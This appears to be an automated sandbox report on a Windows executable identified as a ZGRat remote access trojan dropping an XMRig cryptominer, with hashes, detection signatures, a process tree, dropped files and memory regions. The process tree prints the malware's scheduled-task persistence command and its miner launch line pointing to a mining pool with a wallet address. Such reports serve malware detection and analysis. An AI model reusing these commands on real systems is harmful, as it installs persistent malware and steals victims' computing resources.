Analysis

  • max time kernel
    297s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-01-2024 22:23

General

  • Target

    8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe

  • Size

    5.6MB

  • MD5

    1a27bd843a09f923661a15300e02d703

  • SHA1

    5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

  • SHA256

    8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

  • SHA512

    330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

  • SSDEEP

    49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 23 IoCs
  • .NET Reactor proctector 4 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 28 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe
    "C:\Users\Admin\AppData\Local\Temp\8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7455.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3304
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
            5⤵
            • Creates scheduled task(s)
            PID:364
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3024
  • C:\Windows\system32\timeout.exe
    timeout 3
    1⤵
    • Delays execution with timeout.exe
    PID:2656
  • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:428
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3896
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2972
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4520

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

    Filesize

    1004KB

    MD5

    70fd5c22e57b88699e99ac28b6497fc5

    SHA1

    99ffe2e9e8f74f08c67dff922aaf186031e8f778

    SHA256

    c10a29d8bcd77d4f7487962c752455334e06f06a28678a9db94665e2aec8459c

    SHA512

    e72b7eb251cf5fb9bc3261e8012befb0a74105d8fee14524203e383becdbdca522f95782ce72266da51882a83da16212ade7e17182c01f815624a32faa64522c

  • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

    Filesize

    554KB

    MD5

    34e6038707008598848ad4943ca86a09

    SHA1

    33f210781c688f67935337c7d2078b0bbf759958

    SHA256

    c7e08f6213b093261928330ee0a2a280e09b089adccfdfd152f309cabc321f1a

    SHA512

    aa1e4208f6af51e726ed844a898f996a6f92e371f92bc5b20354570234875f7f67b0dad26ec1c75b369cab476d00ea146ab4f58d976a301e501ee8e480457fc0

  • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

    Filesize

    5.6MB

    MD5

    1a27bd843a09f923661a15300e02d703

    SHA1

    5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

    SHA256

    8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

    SHA512

    330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

    Filesize

    1KB

    MD5

    99e47c178875de9fe1675fe5ba0e1f42

    SHA1

    c28934210fbe9d2ee90e751b8cf21be297b3d171

    SHA256

    773f7a03c7b56de09b71249ce4920458ef67fda14b923df1d5ebc1725101b9ff

    SHA512

    7a4b79273bbc4b5966680a48d63115feed3ae48dfc0ea2a7a11e202d06d9ecab2b4b1b8e2a3d1eb9e9b35169cf9ca866f785875e19e5eeadfe11b54500c05f4c

  • C:\Users\Admin\AppData\Local\Temp\tmp7455.tmp.bat

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/428-47-0x000000001C710000-0x000000001C720000-memory.dmp

    Filesize

    64KB

  • memory/428-46-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/428-48-0x0000000001540000-0x0000000001541000-memory.dmp

    Filesize

    4KB

  • memory/428-60-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/1792-0-0x0000000000B30000-0x00000000010D0000-memory.dmp

    Filesize

    5.6MB

  • memory/1792-10-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/1792-3-0x0000000003A00000-0x0000000003A01000-memory.dmp

    Filesize

    4KB

  • memory/1792-2-0x000000001CC80000-0x000000001CC90000-memory.dmp

    Filesize

    64KB

  • memory/1792-1-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/3024-39-0x000002A3DA6F0000-0x000002A3DA710000-memory.dmp

    Filesize

    128KB

  • memory/3024-17-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-24-0x000002A3D8E20000-0x000002A3D8E40000-memory.dmp

    Filesize

    128KB

  • memory/3024-25-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-26-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-27-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-28-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-29-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-33-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-32-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-34-0x000002A3DA6D0000-0x000002A3DA6F0000-memory.dmp

    Filesize

    128KB

  • memory/3024-35-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-37-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-36-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-23-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-38-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-40-0x000002A3DA710000-0x000002A3DA730000-memory.dmp

    Filesize

    128KB

  • memory/3024-41-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-42-0x000002A3DA6F0000-0x000002A3DA710000-memory.dmp

    Filesize

    128KB

  • memory/3024-43-0x000002A3DA710000-0x000002A3DA730000-memory.dmp

    Filesize

    128KB

  • memory/3024-21-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-22-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3024-19-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4284-14-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/4284-16-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

    Filesize

    4KB

  • memory/4284-20-0x00007FF99FD10000-0x00007FF9A06FC000-memory.dmp

    Filesize

    9.9MB

  • memory/4284-15-0x000000001C250000-0x000000001C260000-memory.dmp

    Filesize

    64KB

  • memory/4520-55-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-65-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-57-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-58-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-52-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-59-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-63-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-56-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-66-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-67-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-68-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/4520-70-0x00000203FE890000-0x00000203FE8B0000-memory.dmp

    Filesize

    128KB

  • memory/4520-71-0x00000203FE8B0000-0x00000203FE8D0000-memory.dmp

    Filesize

    128KB

  • memory/4520-72-0x00000203FE890000-0x00000203FE8B0000-memory.dmp

    Filesize

    128KB

  • memory/4520-73-0x00000203FE8B0000-0x00000203FE8D0000-memory.dmp

    Filesize

    128KB